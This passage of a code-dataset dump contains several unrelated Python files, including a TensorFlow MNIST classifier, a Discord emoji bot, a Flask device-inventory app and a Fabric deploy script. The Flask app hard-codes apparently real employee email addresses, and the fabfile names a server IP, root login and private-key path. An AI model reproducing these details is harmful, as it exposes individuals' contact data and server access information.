traversal order is unspecified. *reduce_func* must be associative in\n order to guarantee a sensible result. See\n :func:`rec_map_reduce_array_container` for additional details.\n \"\"\"\n # NOTE: this wrapper matches the signature of `deserialize_container`\n # to make plugging into `_multimap_array_container_impl` easier\n def _reduce_wrapper(ary: ContainerT, iterable: Iterable[Tuple[Any, Any]]) -> Any:\n return reduce_func([subary for _, subary in iterable])\n\n return _multimap_array_container_impl(\n map_func, *args,\n reduce_func=_reduce_wrapper, leaf_cls=None, recursive=True)\n\n# }}}\n\n\n# {{{ freeze/thaw\n\n@singledispatch\ndef freeze(\n ary: ArrayOrContainerT,\n actx: Optional[ArrayContext] = None) -> ArrayOrContainerT:\n r\"\"\"Freezes recursively by going through all components of the\n :class:`ArrayContainer` *ary*.\n\n :param ary: a :meth:`~ArrayContext.thaw`\\ ed :class:`ArrayContainer`.\n\n Array container types may use :func:`functools.singledispatch` ``.register`` to\n register additional implementations.\n\n See :meth:`ArrayContext.thaw`.\n \"\"\"\n if is_array_container(ary):\n return map_array_container(partial(freeze, actx=actx), ary)\n else:\n if actx is None:\n raise TypeError(\n f\"cannot freeze arrays of type {type(ary).__name__} \"\n \"when actx is not supplied. Try calling actx.freeze \"\n \"directly or supplying an array context\")\n else:\n return actx.freeze(ary)\n\n\n@singledispatch\ndef thaw(ary: ArrayOrContainerT, actx: ArrayContext) -> ArrayOrContainerT:\n r\"\"\"Thaws recursively by going through all components of the\n :class:`ArrayContainer` *ary*.\n\n :param ary: a :meth:`~ArrayContext.freeze`\\ ed :class:`ArrayContainer`.\n\n Array container types may use :func:`functools.singledispatch` ``.register``\n to register additional implementations.\n\n See :meth:`ArrayContext.thaw`.\n\n Serves as the registration point (using :func:`~functools.singledispatch`\n ``.register`` to register additional implementations for :func:`thaw`.\n\n .. note::\n\n This function has the reverse argument order from the original function\n in :mod:`meshmode`. This was necessary because\n :func:`~functools.singledispatch` only dispatches on the first argument.\n \"\"\"\n try:\n iterable = serialize_container(ary)\n except TypeError:\n return actx.thaw(ary)\n else:\n return deserialize_container(ary, [\n (key, thaw(subary, actx)) for key, subary in iterable\n ])\n\n# }}}\n\n\n# {{{ numpy conversion\n\ndef from_numpy(ary: Any, actx: ArrayContext) -> Any:\n \"\"\"Convert all :mod:`numpy` arrays in the :class:`~arraycontext.ArrayContainer`\n to the base array type of :class:`~arraycontext.ArrayContext`.\n\n The conversion is done using :meth:`arraycontext.ArrayContext.from_numpy`.\n \"\"\"\n def _from_numpy(subary: Any) -> Any:\n if isinstance(subary, np.ndarray) and subary.dtype != \"O\":\n return actx.from_numpy(subary)\n elif is_array_container(subary):\n return map_array_container(_from_numpy, subary)\n else:\n raise TypeError(f\"unrecognized array type: '{type(subary).__name__}'\")\n\n return _from_numpy(ary)\n\n\ndef to_numpy(ary: Any, actx: ArrayContext) -> Any:\n \"\"\"Convert all arrays in the :class:`~arraycontext.ArrayContainer` to\n :mod:`numpy` using the provided :class:`~arraycontext.ArrayContext` *actx*.\n\n The conversion is done using :meth:`arraycontext.ArrayContext.to_numpy`.\n \"\"\"\n return rec_map_array_container(actx.to_numpy, ary)\n\n# }}}\n\n# vim: foldmethod=marker\n","sub_path":"arraycontext/container/traversal.py","file_name":"traversal.py","file_ext":"py","file_size_in_byte":18979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"447679332","text":"#-*- encoding: utf-8 -*-\nimport sys\nfrom itertools import permutations\nr=sys.stdin.readline\n \nN, M = map(int, r().split())\n\nl = [str(num) for num in range(1, N+1)]\n\nfor per in permutations(l, M):\n print(' '.join(per))\n","sub_path":"Algorithm/Baekjoon/15649 N과 M (1)/15649(2).py","file_name":"15649(2).py","file_ext":"py","file_size_in_byte":221,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"347210560","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport tensorflow as tf\nimport numpy as np\nimport os\nimport parser\nimport urllib.request as ulr\n\nif os.path.exists(\"./MNIST_DATA\") is not True:\n os.mkdir(\"./MNIST_DATA\")\n\n trainImgURL=\"http://yann.lecun.com/exdb/mnist/train-images-idx3-ubyte.gz\"\n trainLabURL=\"http://yann.lecun.com/exdb/mnist/train-labels-idx1-ubyte.gz\"\n testImgURL=\"http://yann.lecun.com/exdb/mnist/t10k-images-idx3-ubyte.gz\"\n testLabURL=\"http://yann.lecun.com/exdb/mnist/t10k-labels-idx1-ubyte.gz\"\n\n ulr.urlretrieve(trainImgURL,filename=\"./MNIST_DATA/trainIMG.gz\")\n ulr.urlretrieve(trainLabURL,filename=\"./MNIST_DATA/trainLAB.gz\")\n ulr.urlretrieve(testImgURL,filename=\"./MNIST_DATA/testIMG.gz\")\n ulr.urlretrieve(testLabURL,filename=\"./MNIST_DATA/testLAB.gz\")\n\ntrainIMG=\"./MNIST_DATA/trainIMG.gz\"\ntrainLAB=\"./MNIST_DATA/trainLAB.gz\"\ntestIMG=\"./MNIST_DATA/testIMG.gz\"\ntestLAB=\"./MNIST_DATA/testLAB.gz\"\n\n# tf estimators require inputs as floats and output labels as ints,specifically an index value b/w [0,dimension)\ntrain_data=parser.parse(trainIMG).astype(np.float32)\ntrain_labels=parser.parse(trainLAB).astype(np.int32)\ntest_data=parser.parse(testIMG).astype(np.float32)\ntest_labels=parser.parse(testLAB).astype(np.int32)\n\ntf.logging.set_verbosity(tf.logging.INFO)\n\ndef cnn_model_fn(features,labels,mode):\n input_layer=tf.reshape(features,[-1,28,28,1]) # batchx28x28x1\n\n conv1=tf.layers.conv2d(\n inputs=input_layer,\n filters=32,\n kernel_size=[5,5],\n padding=\"same\",\n activation=tf.nn.relu\n ) # batchx28x28x32\n\n pool1=tf.layers.max_pooling2d(\n inputs=conv1,\n pool_size=[2,2],\n strides=2\n ) # batchx14x14x32\n\n conv2=tf.layers.conv2d(\n inputs=pool1,\n filters=64,\n kernel_size=[5,5],\n padding=\"same\",\n activation=tf.nn.relu\n ) # batchx14x14x64\n\n pool2=tf.layers.max_pooling2d(\n inputs=conv2,\n pool_size=[2,2],\n strides=2\n )\n\n pool2_flat=tf.reshape(pool2,[-1,7*7*64]) # batchx1024\n\n dense=tf.layers.dense(\n inputs=pool2_flat,\n units=1024,\n activation=tf.nn.relu\n ) # batchx1024\n\n dropout=tf.layers.dropout(\n inputs=dense,\n rate=0.4,\n training = (mode==tf.estimator.ModeKeys.TRAIN)\n ) # batchx1024\n\n logits=tf.layers.dense(\n inputs=dropout,\n units=10\n ) # batchx10\n\n predictions={\n \"predicted_classes\":tf.argmax(input=logits,axis=1), # predicted class\n \"probabilities\":tf.nn.softmax(logits, name=\"sftmx_tensor\") # probability of this prediction\n }\n\n if mode == tf.estimator.ModeKeys.PREDICT:\n return tf.estimator.EstimatorSpec(mode=mode, predictions=predictions)\n\n loss=tf.losses.sparse_softmax_cross_entropy(labels=labels, logits=logits)\n\n if mode == tf.estimator.ModeKeys.TRAIN:\n optimizer=tf.train.GradientDescentOptimizer(learning_rate=0.001).minimize(loss=loss,global_step=tf.train.get_global_step())\n return tf.estimator.EstimatorSpec(mode=mode,loss=loss,train_op=optimizer)\n\n eval_metric_ops={\n \"accuracy\":tf.metrics.accuracy(labels=labels,predictions=predictions[\"predicted_classes\"])\n }\n\n return tf.estimator.EstimatorSpec(mode=mode,loss=loss,eval_metric_ops=eval_metric_ops)\n\ndef main(unused_argv):\n mnist_model=tf.estimator.Estimator(\n model_fn=cnn_model_fn,\n model_dir=\"./mnist-model\"\n )\n\n tensors_to_log={\"probabilities\":\"sftmx_tensor\"}\n logging_hook=tf.train.LoggingTensorHook(\n tensors=tensors_to_log, every_n_iter=50\n )\n\n train_input_fn=tf.estimator.inputs.numpy_input_fn(\n x=train_data,\n y=train_labels,\n batch_size=100,\n num_epochs=None,\n shuffle=True\n )\n\n mnist_model.train(\n input_fn=train_input_fn,\n steps=10000,\n hooks=[logging_hook]\n )\n\n eval_input_fn=tf.estimator.inputs.numpy_input_fn(\n x=test_data,\n y=test_labels,\n num_epochs=1,\n shuffle=False\n )\n\n eval_results=mnist_model.evaluate(\n input_fn=eval_input_fn,\n )\n\n print (eval_results)\n\nif __name__==\"__main__\":\n tf.app.run()\n","sub_path":"mnistclassifier/mnistFinal.py","file_name":"mnistFinal.py","file_ext":"py","file_size_in_byte":4241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"367954398","text":"from sense_hat import SenseHat\nfrom time import sleep\nsense = SenseHat()\n\nb = (0, 0, 0)\nw = (255, 255, 255)\nr = (255, 0, 0)\n\nboard = [[r, r, r, b, b, b, b, r],\n [r, b, b, b, b, b, b, r],\n [b, b, b, b, b, r, b, r],\n [b, r, r, b, r, r, b, r],\n [b, b, b, b, b, b, b, b],\n [b, r, b, r, r, b, b, b],\n [b, b, b, r, b, b, b, r],\n [r, r, b, b, b, r, r, r]]\n\ny = 2 # y coordinate of marble\nx = 2 # x coordinate of marble\nboard[y][x] = w # a white marble\n\nboard_1D = sum(board, []) # convert to 1-dimension list\nprint(board_1D) # for code debugging\nsense.set_pixels(board_1D) # display it\n\n# This function checks the pitch value and the x coordinate\n# to determine whether to move the marble in the x-direction.\n# Similarly, it checks the roll value and y coordinate to\n# determine whether to move the marble in the y-direction.\n\n\ndef move_marble(pitch, roll, x, y):\n new_x = x # assume no change to start with\n new_y = y # assume no change to start with\n if 1 < pitch < 179 and x != 0:\n new_x -= 1 # move left\n elif 359 > pitch > 179 and x != 7:\n new_x += 1 # move right\n if 1 < roll < 179 and y != 7:\n new_y += 1 # move up\n elif 359 > roll > 179 and y != 0:\n new_y -= 1 # move down\n new_x, new_y = check_wall(x, y, new_x, new_y)\n return new_x, new_y\n\n\ndef check_wall(x, y, new_x, new_y):\n if board[new_y][new_x] != r:\n return new_x, new_y\n elif board[new_y][x] != r:\n return x, new_y\n elif board[y][new_x] != r:\n return new_x, y\n else:\n return x, y\n\nwhile True:\n pitch = sense.get_orientation()['pitch']\n roll = sense.get_orientation()['roll']\n board[y][x] = b\n x, y = move_marble(pitch, roll, x, y)\n board[y][x] = w\n sense.set_pixels(sum(board, []))\n sleep(0.05)\n","sub_path":"lab-exercises/ex6/ex6d.py","file_name":"ex6d.py","file_ext":"py","file_size_in_byte":1837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"307062321","text":"\"\"\"\nscript for building initial database, will look through message history in all available channels and build json\n\"\"\"\nimport json, logging\nimport discord\nimport emojis\nfrom emojiget import emojiget\n\nlogging.basicConfig(level=logging.INFO)\n\nclass Client(discord.Client):\n def __init__(self):\n discord.Client.__init__(self)\n self.stats = {}\n\n async def on_ready(self):\n logging.info(\"Logged in as {0}\".format(self.user))\n\n #going through every channel in every guild the bot is in\n for guild in self.guilds:\n for channel in guild.text_channels: \n for message in await channel.history(limit=10000).flatten():\n \n #making music bots are ignored\n if not message.author.bot:\n \n #defining some variables for later use\n guildID = str(message.guild.id)\n authorID = str(message.author.id)\n\n #checking for custom/partial emoji in message\n emojilist = emojiget(message.content)\n\n if emojilist:\n logging.info(\"Message proccessed in guild {0}, channel {1}, author {2}: {3} emojis\".format(str(message.guild), message.channel.name, str(message.author), len(emojilist)))\n\n #going through each emoji in the message and updating dictionary\n for emoji in emojilist:\n emoji = str(emoji)\n if guildID in self.stats:\n \n if authorID in self.stats[guildID]:\n \n if emoji in self.stats[guildID][authorID]:\n self.stats[guildID][authorID][emoji] += 1\n\n else:\n self.stats[guildID][authorID][emoji] = 1\n\n else:\n self.stats[guildID][authorID] = {emoji: 1}\n\n else:\n self.stats[guildID] = {authorID: {emoji: 1}}\n \n #dumping list to json\n with open(\"stats.json\", \"w\") as f:\n f.write(json.dumps(self.stats))\n\n await self.logout()\n \n\n#init client object and starting the bot with secret token\nclient = Client()\n\nwith open(\"token\", \"r\") as f:\n TOKEN = f.read()\n\nclient.run(TOKEN)","sub_path":"buildjson.py","file_name":"buildjson.py","file_ext":"py","file_size_in_byte":2787,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"413195644","text":"from parmed.amber import * \n\nbase = AmberParm(\"SYSTEM.top\",\"SYSTEM.crd\")\n\noutputf = open(\"charges.csv\",\"w\")\n\nfor at in base.residues[0].atoms:\n #at name, charge\n outputf.write(\"%s, %.4f\\n\" % (at.name,at.charge))\n\n\noutputf.close()\n","sub_path":"nautilus/buggy/e/charges.py","file_name":"charges.py","file_ext":"py","file_size_in_byte":236,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"328015035","text":"import components\n\ndef LSRRFwBroken (sz):\n assert (sz >= 1)\n endhosts = ['e0', 'e1']\n lsrr_boxes = ['l_%d'%(l) for l in xrange(0, sz)]\n firewall = ['f']\n nodes = list()\n nodes.extend(endhosts)\n nodes.extend(lsrr_boxes)\n nodes.extend(firewall)\n addresses = ['ip_%s'%(c) for c in nodes]\n\n ctx = components.Context(nodes, \\\n addresses)\n net = components.Network(ctx)\n # Register something that tells us about LSRR\n ip_lsr_field = components.LSRROption ('ip_lsr', ctx)\n ctx.AddPolicy (ip_lsr_field)\n e0 = components.EndHost(ctx.e0, net, ctx)\n e1 = components.EndHost(ctx.e1, net, ctx)\n ## Yeah I can put this in a list etc., doing it this way mostly for no good reason.\n #a = components.LSRRRouter (ctx.a, ip_lsr_field, net, ctx)\n #b = components.LSRRRouter (ctx.b, ip_lsr_field, net, ctx)\n lsrrs = [components.LSRRRouter (getattr(ctx, n), ip_lsr_field, net, ctx) for n in lsrr_boxes]\n lsrr_addresses = [getattr(ctx, 'ip_%s'%(l.z3Node)) for l in lsrrs]\n f = components.AclFirewall (ctx.f, net, ctx)\n address_mappings = [(e0, ctx.ip_e0), \\\n (e1, ctx.ip_e1), \\\n (f, ctx.ip_f)]\n lsrr_address_mappings = zip(lsrrs, lsrr_addresses)\n address_mappings.extend(lsrr_address_mappings)\n net.setAddressMappings(address_mappings)\n routing_table_base = zip(lsrr_addresses, lsrrs)\n routing_table_base.append((ctx.ip_e0, e0))\n\n net.SetGateway(e1, f)\n\n f.AddAcls([(ctx.ip_e0, ctx.ip_e1)])\n\n f_routing_table = list(routing_table_base)\n f_routing_table.append((ctx.ip_e1, e1))\n net.RoutingTable(f, f_routing_table)\n\n routing_table_base.append((ctx.ip_e1, f))\n\n net.RoutingTable(e0, routing_table_base)\n for l in lsrrs:\n net.RoutingTable(l, routing_table_base)\n net.Attach(e0, e1, f, *lsrrs)\n class LSRRReturn (object):\n def __init__ (self, net, ctx, e0, e1, f, lsrrs):\n self.net = net\n self.ctx = ctx\n self.e0 = e0\n self.e1 = e1\n self.f = f\n self.lsrrs = lsrrs\n self.check = components.PropertyChecker (ctx, net)\n return LSRRReturn (net, ctx, e0, e1, f, lsrrs)\n","sub_path":"tests/concrete_examples/lsrr_fw_example_obv_broken.py","file_name":"lsrr_fw_example_obv_broken.py","file_ext":"py","file_size_in_byte":2221,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"197243616","text":"from flask_app import app, db\nfrom flask import render_template, request, flash, session, redirect, url_for, jsonify\nfrom .forms import ContactForm, SignupForm, SigninForm, ChangePasswordForm, \\\n AddDeviceForm, SearchDeviceForm, DeviceAssignForm, AssignHistoryForm\nfrom flask_mail import Message, Mail\nfrom .models import User, Device, DeviceAssignment\nfrom functools import wraps\nfrom sqlalchemy import desc\nimport datetime\nfrom threading import Thread\nfrom celery import Celery\n\nmail = Mail()\n\ncelery = Celery(app.name, broker=app.config['CELERY_BROKER_URL'])\ncelery.conf.update(app.config)\n\nadmins = [\"gtadala@blackberry.com\", \"pchowdam@blackberry.com\", \"ksunkara@blackberry.com\"]\n\n\n@celery.task\ndef send_async_email(message_details):\n \"\"\"Background task to send an email with Flask-Mail.\"\"\"\n with app.app_context():\n msg = Message(message_details['subject'], recipients=message_details['recipients'])\n msg.body = message_details['body']\n mail.send(msg)\n\n\ndef login_required(f):\n @wraps(f)\n def decorated_function(*args, **kwargs):\n if 'email' in session:\n return redirect(url_for('signin', next=request.url))\n return render_template(f.__name__+'.html', *args, **kwargs)\n return decorated_function\n\n\ndef to_bool(value):\n return str(value).lower() == \"true\"\n\n\n@app.route('/')\n@login_required\ndef home():\n pass\n\n\n@app.route('/contact', methods=['GET', \"POST\"])\ndef contact():\n form = ContactForm()\n if request.method == 'POST':\n if not form.validate():\n flash('All fields are required.')\n return render_template('contact.html', form=form)\n else:\n msg = Message(form.subject.data, sender='contact@example.com',\n recipients=['your_email@example.com'])\n msg.body = \"\"\"\n From: %s <%s>\n %s\n \"\"\" % (form.name.data, form.email.data, form.message.data)\n mail.send(msg)\n return render_template('contact.html', success=True)\n elif request.method == 'GET':\n return render_template('contact.html', form=form)\n\n\n@app.route('/signup', methods=['GET', 'POST'])\ndef signup():\n form = SignupForm()\n\n if 'email' in session:\n return redirect(url_for('profile'))\n\n if request.method == 'POST':\n if not form.validate():\n return render_template('signup.html', form=form)\n else:\n newuser = User(form.firstname.data, form.lastname.data, form.email.data, form.password.data)\n db.session.add(newuser)\n db.session.commit()\n\n session['email'] = newuser.email\n session['is_admin'] = (newuser.admin == True)\n return redirect(url_for('profile'))\n\n elif request.method == 'GET':\n return render_template('signup.html', form=form)\n\n\n@app.route('/profile')\ndef profile():\n if 'email' not in session:\n return redirect(url_for('signin'))\n\n user = User.query.filter_by(email=session['email']).first()\n\n if user is None:\n return redirect(url_for('signin'))\n else:\n devices_list = Device.query.join(User).filter(Device.assignee_id==user.uid).all()\n if not devices_list:\n message = \"No devices assigned to your name\"\n return render_template('profile.html', success=False, message=message, user=user)\n\n message = \"Following list of devices assigned to your name\"\n return render_template('profile.html', success=True, devices=devices_list, message=message, user=user)\n\n\n@app.route('/device_detail/', methods=['GET'])\ndef device_detail(vlid):\n if 'email' not in session:\n return redirect(url_for('signin'))\n\n device_info = Device.query.filter_by(vl_tag=vlid).first()\n\n if not device_info:\n message = \"Device Information is not found for device with ID {0}\".format(vlid)\n return render_template('device_detail.html', success=False, message=message)\n\n message = \"Device information for device with ID {0}\".format(vlid)\n user_info = User.query.filter_by(uid=device_info.assignee_id).first()\n return render_template('device_detail.html', success=True, message=message, info=device_info, user=user_info)\n\n@app.route('/signin', methods=['GET', 'POST'])\ndef signin():\n form = SigninForm()\n\n if 'email' in session:\n return redirect(url_for('profile'))\n\n if request.method == 'POST':\n if not form.validate():\n return render_template('signin.html', form=form)\n else:\n user_info = User.query.filter_by(email=form.email.data).first()\n session['email'] = form.email.data\n session['is_admin'] = (user_info.admin == True)\n return redirect(url_for('profile'))\n\n elif request.method == 'GET':\n return render_template('signin.html', form=form)\n\n\n@app.route('/signout')\ndef signout():\n if 'email' not in session:\n return redirect(url_for('signin'))\n\n session.pop('email', None)\n return redirect(url_for('home'))\n\n\n@app.route('/change_password', methods=['GET', 'POST'])\ndef change_password():\n form = ChangePasswordForm()\n\n if 'email' not in session:\n return redirect(url_for('signin'))\n\n if request.method == 'GET':\n return render_template('change_password.html', form=form)\n\n elif request.method == 'POST':\n if not form.validate():\n return render_template('change_password.html', form=form)\n else:\n user = User.query.filter_by(email=session['email'].lower()).first()\n user.set_password(form.newPassword.data)\n db.session.commit()\n return render_template('change_password.html', success=True)\n\n\n@app.route('/add_device', methods=['GET', 'POST'])\ndef add_device():\n form = AddDeviceForm()\n\n if 'email' not in session or not session['is_admin']:\n return redirect(url_for('signin'))\n\n if request.method == 'GET':\n return render_template('add_device.html', form=form)\n\n elif request.method == 'POST':\n if not form.validate():\n return render_template('add_device.html', form=form)\n else:\n secure = to_bool(form.is_secure.data)\n newDevice = Device(variant=form.variant.data.upper(), name=form.name.data.upper(), security=secure,\n part_number=form.part_number.data, imei=form.imei_number.data,\n country=form.country.data.upper(), vlid=form.vlId.data,\n pgrp=form.purpose_group.data, comments=form.comments.data,\n assigned_date=datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\"))\n\n db.session.add(newDevice)\n db.session.commit()\n\n user = User.query.filter_by(uid=1).first()\n device_info = Device.query.filter_by(vl_tag=form.vlId.data).first()\n newDeviceAssignment = DeviceAssignment(device_id=device_info.uid,\n user_id=user.uid, device_assigned_date=device_info.assigned_date)\n db.session.add(newDeviceAssignment)\n db.session.commit()\n\n return render_template('add_device.html', success=True,\n message=\"New device {0} is added to database\".format(form.vlId.data))\n\n\n@app.route('/search_device', methods=['GET', 'POST'])\ndef search_device():\n form = SearchDeviceForm()\n\n if 'email' not in session:\n return redirect(url_for('signin'))\n if request.method == 'GET':\n return render_template('search_device.html', form=form)\n\n elif request.method == 'POST':\n if not form.validate():\n return render_template('search_device.html', form=form)\n else:\n message = \"Search Results\"\n search_string = form.search_string.data\n devices_list = []\n\n if form.search_using.data == \"vlbb_id\":\n devices_list = Device.query.filter_by(vl_tag=search_string).all()\n if not devices_list:\n message = \"No Devices found with VLBB ID: {0}\".format(search_string)\n return render_template('search_device.html', form=form, message=message, success=False)\n\n elif form.search_using.data == \"imei_number\":\n devices_list = Device.query.filter_by(imei_number=search_string).all()\n if not devices_list:\n message = \"No Devices found with IMEI number {0}\".format(search_string)\n return render_template('search_device.html', form=form, message=message, success=False)\n\n elif form.search_using.data == \"device_name\":\n devices_list = Device.query.filter(Device.name.contains(search_string.upper())).all()\n if not devices_list:\n message = \"No Devices found with Device Name {0}\".format(search_string)\n return render_template('search_device.html', form=form, message=message, success=False)\n\n elif form.search_using.data == \"device_variant\":\n devices_list = Device.query.filter(Device.variant.contains(search_string)).all()\n if not devices_list:\n message = \"No Devices found with Device Variant {0}\".format(search_string)\n return render_template('search_device.html', form=form, message=message, success=False)\n\n elif form.search_using.data == \"user_email\":\n user_info = User.query.filter(User.email.contains(search_string)).first()\n if not user_info:\n message = \"No user found with email address {0}\".format(search_string)\n return render_template('search_device.html', form=form, message=message, success=False)\n devices_list = Device.query.join(User).filter(Device.assignee_id == user_info.uid).all()\n if not devices_list:\n message = \"No devices assigned to user {0}\".format(user_info.firstname)\n return render_template('search_device.html', form=form, message=message, success=False)\n\n if form.search_using.data == \"vlbb_id\":\n message += \" for device VLBB ID: {0}\".format(search_string)\n elif form.search_using.data == \"imei_number\":\n message += \" for device IMEI Number: {0}\".format(search_string)\n elif form.search_using.data == \"device_name\":\n message += \" for device name: {0}\".format(search_string.upper())\n elif form.search_using.data == \"device_variant\":\n message += \" for device variant contains words: {0}\".format(search_string.upper())\n elif form.search_using.data == \"user_email\":\n message += \" for devices assigned to user with email address contains letters: {0}\".format(search_string)\n\n for device in devices_list:\n device.user_info = User.query.filter_by(uid=device.assignee_id).first()\n\n return render_template('search_device.html', form=form, devices=devices_list, success=True, message=message)\n\n\n@app.route('/assign_device/', methods=['GET'])\ndef assign_device(vlid):\n if 'email' not in session:\n return redirect(url_for('signin'))\n\n device_info = Device.query.filter_by(vl_tag=vlid).first()\n\n if not device_info:\n message = \"Device Information is not found for device with ID {0}\".format(vlid)\n return render_template('assign_device.html', success=False, message=message)\n\n user = User.query.filter_by(email=session['email'].lower()).first()\n device = Device.query.filter_by(vl_tag=vlid).update(dict(assignee_id=user.uid))\n db.session.commit()\n\n device = Device.query.filter_by(vl_tag=vlid).first()\n device.assigned_date = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n db.session.commit()\n\n device = Device.query.filter_by(vl_tag=vlid).first()\n newDeviceAssignment = DeviceAssignment(device_id=device.uid,\n user_id=user.uid, device_assigned_date=device.assigned_date)\n db.session.add(newDeviceAssignment)\n db.session.commit()\n\n # Send Email to users / admins\n send_email_helper(user, device)\n\n message = \"Device with VLBB ID {0} is assigned with your name\".format(vlid)\n return render_template('search_device.html', success=True, message=message, from_assigned=True)\n\n\n@app.route('/assign_device_user', methods=['POST', 'GET'])\ndef assign_device_user():\n form = DeviceAssignForm()\n\n if 'email' not in session or not session['is_admin']:\n return redirect(url_for('signin'))\n\n if request.method == 'GET':\n return render_template('assign_device_user.html', form=form)\n\n elif request.method == 'POST':\n if not form.validate():\n return render_template('assign_device_user.html', form=form)\n\n user = User.query.filter_by(email=form.email_id.data.lower()).first()\n if not user:\n message = \"User might not have registered his email id, ask him to register\"\n return render_template('assign_device_user.html', form=form, success=False, message=message)\n\n device = Device.query.filter_by(vl_tag=form.vl_id.data).first()\n if not device:\n message = \"Deice not found with VLBB Tag {0}, please check the data entered\".format(form.vl_id.data)\n return render_template('assign_device_user.html', form=form, success=False, message=message)\n\n if device.assignee_id == user.uid:\n message = \"User is already assigned with selected device\"\n return render_template('assign_device_user.html', form=form, success=False, message=message)\n else:\n device.assignee_id = user.uid\n device.assigned_date = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n db.session.commit()\n\n device = Device.query.filter_by(vl_tag=form.vl_id.data).first()\n newDeviceAssignment = DeviceAssignment(device_id=device.uid,\n user_id=user.uid, device_assigned_date=device.assigned_date)\n db.session.add(newDeviceAssignment)\n db.session.commit()\n\n # Send Email to users / admins\n send_email_helper(user, device)\n\n message = \"User is assigned with device {0}\".format(device.vl_tag)\n return render_template('assign_device_user.html', form=form, success=True, message=message)\n\n\n@app.route('/assignment_history', methods=['POST', 'GET'])\ndef assignment_history():\n form = AssignHistoryForm()\n if 'email' not in session or not session['is_admin']:\n return redirect(url_for('signin'))\n\n if request.method == 'GET':\n return render_template('assignment_history.html', form=form)\n\n elif request.method == 'POST':\n if not form.validate():\n return render_template('assignment_history.html', form=form)\n search_device = Device.query.filter_by(vl_tag=form.vlid.data).first()\n\n\n if not search_device:\n message = \"No devices found with selected VLBB ID {0}\".format(form.vlid.data)\n return render_template('assignment_history.html', form=form, success=False, message=message)\n\n device = DeviceAssignment.query.filter_by(device_id=search_device.uid).\\\n order_by(desc(DeviceAssignment.device_assigned_date)).all()\n if not device:\n message = \"No devices found with selected VLBB ID {0}\".format(form.vlid.data)\n return render_template('assignment_history.html', form=form, success=False, message=message)\n\n output = []\n for _d in device:\n temp = []\n temp.append(Device.query.filter_by(uid=_d.device_id).first().vl_tag)\n temp.append(User.query.filter_by(uid=_d.user_id).first().firstname)\n temp.append(_d.device_assigned_date)\n output.append(temp)\n\n message = \"Device Assignment History for device with VLBB ID: {0}\".format(format(form.vlid.data))\n return render_template('assignment_history.html', form=form, success=True, message=message, data=output)\n\n\ndef send_email_helper(user, device):\n\n message = \"Hello {0}, \\n\\nThe device with VL Tag {1} \".format(user.firstname, device.vl_tag) + \\\n \" is assigned to your name. \\n\" + \\\n \"\\nIf this device is not with you, please contact inventory admins\\n\" + \\\n \"\\nPlease visit \" + url_for('profile', _external=True) + \" for more details\" + \\\n \"\\n\\n Thanks, \\n BlackBerry Hyderabad Inventory Team\"\n\n # Send email to user\n subject = 'Device with VL Tag {0} assigned with your name'.format(device.vl_tag)\n\n message_details = dict()\n message_details[\"subject\"] = subject\n message_details[\"recipients\"] = [user.email]\n message_details[\"body\"] = message\n\n send_async_email.delay(message_details)\n\n # Send email to admins\n subject = 'Device with VL Tag {0} assigned to {1}'.format(device.vl_tag, user.firstname)\n message_details[\"subject\"] = subject\n message_details[\"recipients\"] = admins\n\n send_async_email.delay(message_details)\n # Done sending emails to users and admins\n\n@app.route('/all_devices')\ndef all_devices():\n if 'email' not in session:\n return redirect(url_for('signin'))\n\n user = User.query.filter_by(email=session['email']).first()\n\n if user is None:\n return redirect(url_for('signin'))\n else:\n devices_list = Device.query.all()\n if not devices_list:\n message = \"No devices available in inventory\"\n return render_template('all_devices.html', success=False, message=message, user=user)\n\n message = \"Following list of currently in BB Hyderabad\"\n return render_template('all_devices.html', success=True, devices=devices_list, message=message, user=user)\n\n\n","sub_path":"app/flask_app/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":17765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"511379971","text":"# fabfile.py\nimport os, re\nfrom datetime import datetime\nimport glob\n\n# 导入Fabric API:\nfrom fabric.api import *\n\n# 服务器登录用户名:\nenv.user = \"root\"\nenv.key_filename = \"D:\\\\Network\\\\id_rsa\"\n\n# 服务器地址,可以有多个,依次部署:\nenv.hosts = [\"202.5.21.246\"]\n\n_TAR_FILE = \"dist-kaguyahime.tar.gz\"\n\n\ndef build():\n excludes = [\"__pycache__\", \"static/node_modules\"]\n local(\"del dist\\\\%s\" % _TAR_FILE)\n with lcd(os.path.join(os.path.abspath(\".\"), \"www\")):\n cmd = [\"tar\", \"--dereference\", \"-czvf\", \"../dist/%s\" % _TAR_FILE]\n cmd.extend([\"--exclude=%s\" % ex for ex in excludes])\n cmd.extend([\".\"])\n local(\" \".join(cmd))\n\n\n_REMOTE_TMP_TAR = \"/home/www/kaguyahime/%s\" % _TAR_FILE\n_REMOTE_BASE_DIR = \"/home/www/kaguyahime/\"\n\n\ndef deploy():\n print(os.getcwd())\n newdir = \"www-%s\" % datetime.now().strftime(\"%y-%m-%d_%H.%M.%S\")\n run(\"mkdir /home/www/kaguyahime/conf -p\")\n run(\"mkdir /home/www/kaguyahime/log -p\")\n for f in glob.glob(\"conf/*\"):\n put(f, _REMOTE_BASE_DIR + f.replace(\"\\\\\", \"/\"))\n # 删除已有的tar文件:\n run(\"rm -f %s\" % _REMOTE_TMP_TAR)\n # 上传新的tar文件:\n put(\"dist/%s\" % _TAR_FILE, _REMOTE_TMP_TAR)\n # 创建新目录:\n with cd(_REMOTE_BASE_DIR):\n run(\"mkdir %s\" % newdir)\n # 解压到新目录:\n with cd(\"%s%s\" % (_REMOTE_BASE_DIR, newdir)):\n run(\"tar -xzvf %s\" % _REMOTE_TMP_TAR)\n # 